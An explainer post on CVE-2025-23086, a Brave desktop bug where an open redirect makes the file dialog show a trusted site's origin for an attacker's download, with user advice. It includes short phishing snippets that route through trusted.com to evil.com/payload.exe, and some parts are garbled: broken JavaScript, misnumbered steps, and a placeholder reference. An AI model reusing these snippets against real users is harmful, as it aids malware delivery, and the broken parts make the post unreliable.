CVE-2025-23086 - Tricking Users with Fake Origins in Brave Browser’s File Selector Dialog

A newly reported vulnerability — CVE-2025-23086 — has been found in Brave Browser for desktop (versions 1.70.x through 1.73.x). This bug lets malicious websites mislead users about the true source of a file upload or download using a combination of Brave’s file selector dialog and a crafty open redirect trick. In simple terms, it makes malware or phishing downloads look like they’re coming from a trusted site.

Let’s break down what went wrong, how the exploitation works, and how to stay safe.

How Did This Vulnerability Happen?

Starting with Brave 1.70.x, the browser tried to be transparent about where file upload/download prompts are coming from. Whenever a site asks the user to select a file (for uploading) or triggers a download, Brave shows the site’s origin inside the file selector dialog. That’s a great feature, *if* the origin is displayed correctly.

But: Sometimes, Brave showed the _wrong_ origin. In particular, if another site (even an untrusted one) redirected the user to the file operation, Brave could incorrectly show the original site's origin in the dialog. If attackers can make use of an _open redirect_ vulnerability on a trusted site, they could start a file download that APPEARS to originate from that trusted site—when it really comes from the attacker’s malicious site.

Glossary

- Origin: The domain (like https://goodbank.com) from which a request was made.
- Open Redirect: A security bug where a site allows users to be redirected to external sites, often used in phishing.

Imagine you get an email from “GoodBank.com” with a link to download your statement

https://goodbank.com/redirect?url=https://malicious.site/download-malware.exe

If GoodBank.com’s /redirect endpoint is an open redirect, it bounces you instantly to https://malicious.site/download-malware.exe.

What Brave Did (with CVE-2025-23086)

When the file download dialog pops up, Brave will show “goodbank.com” as the origin in the OS file picker dialog—not “malicious.site”—even though the *actual file* comes from the attacker’s domain.

Assume

- trusted.com is a reputable site with an open redirect at /redirect

`

https://trusted.com/redirect?url=https://evil.com/payload.exe

Victim clicks the link (from email or social media).

3. The browser is sent to trusted.com, then instantly redirected to evil.com/payload.exe.
4. Brave’s file download dialog appears, but its origin message says: _“trusted.com wants to download a file”_.

Poisoned Trust

Users are much more likely to trust a file download initiated seemingly by a reputable site. With CVE-2025-23086, attackers gain a social engineering advantage: disguising their file downloads as coming from any site with an open redirect.

Technical Snippet

Here’s how attackers can use JavaScript to exploit this, assuming cross-origin downloads are allowed:

// On evil.com
const trustedRedirect = "https://trusted.com/redirect?url="; + encodeURIComponent("https://evil.com/payload.exe";);
window.location.href = trustedRedirect;
// Brave will show 'trusted.com' as the download origin in the file selector dialog!

Or, using a download link for social engineering

<!-- Phishing page on evil.com -->
<a href="https://trusted.com/redirect?url=https://evil.com/malware.zip"; download>
  Click here to download your invoice
</a>

The file dialog will show:

"trusted.com wants to download a file"
(not evil.com!)

References

- CVE Entry (CVE-2025-23086)
- Brave Security Advisory with fix *(replace with actual issue when published)*
- Open Redirects: Explained
- Social Engineering with Open Redirects

For Users

- Update your Brave Browser: Brave fixed this vulnerability after v1.73.x. Install the latest version.

Be careful with download prompts: Never trust the origin shown on the file dialog alone.

- Watch for suspicious links: If a download comes through a redirect, be suspicious—even if it looks “trusted.”

Use a whitelist

More info: Preventing Open Redirects

Conclusion

CVE-2025-23086 is a clever trick: it combines browser UI design and a common web security misconfiguration (open redirects) to fool users about the origin of file uploads/downloads. Even vigilant users can be fooled by this, because their browser appears to confirm that the download comes from a trusted, familiar site.

The fix is out, but the lesson is lasting:
Never trust file dialogs blindly, keep your browser updated, and treat any site that allows open redirects with skepticism when it comes to downloads or uploads.


*Stay safe on the web! Update now. And don’t click strange download links—even from your bank.*

Timeline

Published on: 01/21/2025 05:15:07 UTC
Last modified on: 01/21/2025 15:15:14 UTC